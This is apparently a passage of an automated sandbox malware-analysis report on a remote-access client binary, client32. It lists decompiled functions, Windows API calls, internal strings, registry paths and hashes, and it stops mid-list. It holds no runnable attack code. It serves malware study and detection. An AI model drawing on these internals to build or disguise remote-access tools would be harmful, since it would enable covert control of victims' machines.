                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ClassErrorExitLastMessageNameProcessWindowwsprintf
                                                                              • String ID: CltAutoLogon.cpp$ComboBox$IsWindow(hWin)
                                                                              • API String ID: 2713866921-163732079
                                                                              • Opcode ID: 14a0087bc9e0b4944a4ea983ce77c4a7d22c973e095c8e634d6da1f2309b0550
                                                                              • Instruction ID: e653eece35be72a1d9193e49b8cd4dff3bda1b57b45a8763bea0034b8aaf2909
                                                                              • Opcode Fuzzy Hash: 14a0087bc9e0b4944a4ea983ce77c4a7d22c973e095c8e634d6da1f2309b0550
                                                                              • Instruction Fuzzy Hash: 9DF0B4B5A0122D6BDB00DF659D01FEEF7ACDF45219F0000A4EB15AA181EB346A15CBD9
                                                                              Function 11146140 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11146010: _memset.LIBCMT ref: 11146055
                                                                                • Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                • Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                • Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                • Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                • Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                              • LoadLibraryA.KERNEL32(gdi32.dll,?,75BFCF90,?,11003D52,00000000,00000008), ref: 11146155
                                                                              • GetProcAddress.KERNEL32(00000000,SetLayout), ref: 11146167
                                                                              • FreeLibrary.KERNEL32(00000000,?,11003D52,00000000,00000008), ref: 1114617E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressFreeLoadProc$DefaultLangSystemVersion_memset
                                                                              • String ID: SetLayout$gdi32.dll
                                                                              • API String ID: 796689547-836973393
                                                                              • Opcode ID: e2a02c7931241414dd0e38b0e94cf2378f17ecdb7d1e00b178c9e364d1f615da
                                                                              • Instruction ID: d41aa01a6e476ec3efb0e30ba4a4f3b24d6e29c0e630937b51d8ced853034778
                                                                              • Opcode Fuzzy Hash: e2a02c7931241414dd0e38b0e94cf2378f17ecdb7d1e00b178c9e364d1f615da
                                                                              • Instruction Fuzzy Hash: B9E0E536300129A7A7041BA6AD449AEBB6CDFC4D6E7110032FD28C3E00DF30D80286B1
                                                                              Function 110ED0D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindow.USER32(00000000), ref: 110ED0D9
                                                                              • SendMessageA.USER32(00000000,0000045B,11020C43,00000000), ref: 110ED10D
                                                                              • SendMessageA.USER32(00000000,00000445,00000000,04000000), ref: 110ED11C
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$Send$ErrorExitLastProcessWindowwsprintf
                                                                              • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)
                                                                              • API String ID: 2446111109-1196874063
                                                                              • Opcode ID: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                              • Instruction ID: de22b858d700e942c4608c09a96d83abbd875fbcce216c0436bbd94e05821714
                                                                              • Opcode Fuzzy Hash: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                              • Instruction Fuzzy Hash: 75E0D82978027837D52176926C0AFDF7B5CCB85A55F058021FB15BB0C1D560730146ED
                                                                              Function 11066240 Relevance: 7.6, APIs: 5, Instructions: 125sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EndPagePrinter.WINSPOOL.DRV(00000000), ref: 11066312
                                                                              • EndDocPrinter.WINSPOOL.DRV(00000000), ref: 11066318
                                                                              • ClosePrinter.WINSPOOL.DRV(00000000,00000000), ref: 1106631E
                                                                              • CloseHandle.KERNEL32(00000000), ref: 11066326
                                                                              • Sleep.KERNEL32(000001F4), ref: 1106635A
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Printer.$Close$HandlePageSleep
                                                                              • String ID:
                                                                              • API String ID: 2391129857-0
                                                                              • Opcode ID: 837e2ad71b4aedaef123a839c0a4d46cfa0a08f569e05cf7b8d3d9f7176c7a1a
                                                                              • Instruction ID: 54f5cd880c03052bf648385b62e688d91943f5081a86e9c826f712f80982fdab
                                                                              • Opcode Fuzzy Hash: 837e2ad71b4aedaef123a839c0a4d46cfa0a08f569e05cf7b8d3d9f7176c7a1a
                                                                              • Instruction Fuzzy Hash: 03417E71E00616EFEB00CF64CD80B9EBBF9BF48359F1081A9D959AB281D770AA41CF50
                                                                              Function 110360A0 Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • CoInitialize.OLE32(00000000), ref: 1103615A
                                                                              • std::exception::exception.LIBCMT ref: 11036181
                                                                              • __CxxThrowException@8.LIBCMT ref: 11036196
                                                                              • std::exception::exception.LIBCMT ref: 110361A5
                                                                              • __CxxThrowException@8.LIBCMT ref: 110361BA
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Exception@8Throwstd::exception::exception$Initialize_malloc_memsetwsprintf
                                                                              • String ID:
                                                                              • API String ID: 1786275401-0
                                                                              • Opcode ID: abf63ed10b9a33d35738ef3545b146c3bbc204ca284e0326731a08126ed97f7e
                                                                              • Instruction ID: 91a3b5653d7650477d6c86e486cf4b90a783982459a57e5f4808bea1ecc0b8d8
                                                                              • Opcode Fuzzy Hash: abf63ed10b9a33d35738ef3545b146c3bbc204ca284e0326731a08126ed97f7e
                                                                              • Instruction Fuzzy Hash: 8B41F7B5D10709AFC715CFAAD98099AFBF8FF18704F50892EE55AA3640E735A604CB90
                                                                              Function 1104F179 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 69sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CAB
                                                                                • Part of subcall function 11034C90: SetForegroundWindow.USER32(?), ref: 11034CB5
                                                                                • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CDF
                                                                                • Part of subcall function 11034C90: Sleep.KERNEL32(00000032), ref: 11034CE9
                                                                              • Sleep.KERNEL32(00000032,LegalNoticeText,?,?,LegalNoticeCaption,?,?,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F191
                                                                              • GetLastError.KERNEL32(00000000,Global\Client32Provider,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F1DF
                                                                              • Sleep.KERNEL32(00000032,?,?,0000004A,00000000,?), ref: 1104F33D
                                                                              • Sleep.KERNEL32(00000032), ref: 1104F383
                                                                              Strings
                                                                              • error opening ipc lap %d to logon, e=%d, %s, xrefs: 1104F1E7
                                                                              • Global\Client32Provider, xrefs: 1104F1BB
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep$EnumWindows$ErrorForegroundLastWindow
                                                                              • String ID: Global\Client32Provider$error opening ipc lap %d to logon, e=%d, %s
                                                                              • API String ID: 3682529815-1899068400
                                                                              • Opcode ID: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
                                                                              • Instruction ID: 6aab5bd338832a8b6cc9a825996d00e4c24ed17e7d33d91b3ba03cdb4d861036
                                                                              • Opcode Fuzzy Hash: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
                                                                              • Instruction Fuzzy Hash: BC212638D4425ACED715DBA4CD98BECB760EB9630AF2001FDD85A97590EF302A45CB12
                                                                              Function 110401D0 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 110400B0: DeleteObject.GDI32(?), ref: 1104019B
                                                                              • CreateRectRgnIndirect.GDI32(?), ref: 11040218
                                                                              • CombineRgn.GDI32(?,?,00000000,00000002), ref: 1104022C
                                                                              • DeleteObject.GDI32(00000000), ref: 11040233
                                                                              • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 11040256
                                                                              • CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 1104026D
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CombineCreateDeleteObjectRect$Indirect
                                                                              • String ID:
                                                                              • API String ID: 3044651595-0
                                                                              • Opcode ID: bdd4bcdb3aa3dcabfe6cf7331a892a45fd264ed50371146b7216a965a4c33285
                                                                              • Instruction ID: 40609504ee2ce5e6893e22a8e9e4794f5f90a477b0a86d2cb080c2a65735e6f6
                                                                              • Opcode Fuzzy Hash: bdd4bcdb3aa3dcabfe6cf7331a892a45fd264ed50371146b7216a965a4c33285
                                                                              • Instruction Fuzzy Hash: 25116D71A40705EFE764CE60CA88BD6F7ECFB14719F10417AE529A29C4C7B4B881CB50
                                                                              Function 1100A250 Relevance: 7.5, APIs: 5, Instructions: 47synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A26E
                                                                              • DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A298
                                                                              • GetLastError.KERNEL32 ref: 1100A2A0
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A2B4
                                                                              • CloseHandle.KERNEL32(00000000), ref: 1100A2BB
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseControlCreateDeviceErrorEventHandleLastObjectSingleWait
                                                                              • String ID:
                                                                              • API String ID: 2062450601-0
                                                                              • Opcode ID: b7a7dcf123d1102af8070ae9ded992f2e722cbafb170e9e3478bdc9f249b2094
                                                                              • Instruction ID: bc93eed9d268af17b12dc0c75b84aef517d95988fbcc1729b49ee65d4685203d
                                                                              • Opcode Fuzzy Hash: b7a7dcf123d1102af8070ae9ded992f2e722cbafb170e9e3478bdc9f249b2094
                                                                              • Instruction Fuzzy Hash: F601F731A40629B7F7159AA8CC45F9DB768AB44775F204320F934A76C0C770A94187D4
                                                                              Function 11034550 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 1103456F
                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 11034578
                                                                              • GetDlgCtrlID.USER32(?), ref: 1103457F
                                                                              • GetClassNameA.USER32(?,?,00000400), ref: 11034592
                                                                              • GetWindowTextA.USER32(?,?,00000400), ref: 110345A5
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$ClassCtrlLongNameRectText
                                                                              • String ID:
                                                                              • API String ID: 2484906136-0
                                                                              • Opcode ID: ce159bbfeb3044cedd36f1e5c8e865b9ac25697cea3e73b3724e752e1ec9f2c1
                                                                              • Instruction ID: c25dcb202ae9d01d0aecf4f64a68191ce3fcfabe0d99871be661b9556b24c4fa
                                                                              • Opcode Fuzzy Hash: ce159bbfeb3044cedd36f1e5c8e865b9ac25697cea3e73b3724e752e1ec9f2c1
                                                                              • Instruction Fuzzy Hash: BAF0AF7244112CABC714DBA4CE48EEEB36CEF09308F004164F62296584DF782A46CBE9
                                                                              Function 11171306 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __getptd.LIBCMT ref: 11171312
                                                                                • Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
                                                                                • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
                                                                              • __getptd.LIBCMT ref: 11171329
                                                                              • __amsg_exit.LIBCMT ref: 11171337
                                                                              • __lock.LIBCMT ref: 11171347
                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 1117135B
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                              • String ID:
                                                                              • API String ID: 938513278-0
                                                                              • Opcode ID: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
                                                                              • Instruction ID: 9cb08520484339131e966c5afe67267813abc49f95b778b0e1eea255b6adbda5
                                                                              • Opcode Fuzzy Hash: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
                                                                              • Instruction Fuzzy Hash: 67F0243AD04322DAE7119BB88801B5CF7A16F0073CF110249D814A77C0CFA47810CB5B
                                                                              Function 110BE0D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 209COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • std::exception::exception.LIBCMT ref: 110BE1F9
                                                                              • __CxxThrowException@8.LIBCMT ref: 110BE20E
                                                                              Strings
                                                                              • HasListener(), xrefs: 110BE19D
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\WBObject.h, xrefs: 110BE198
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
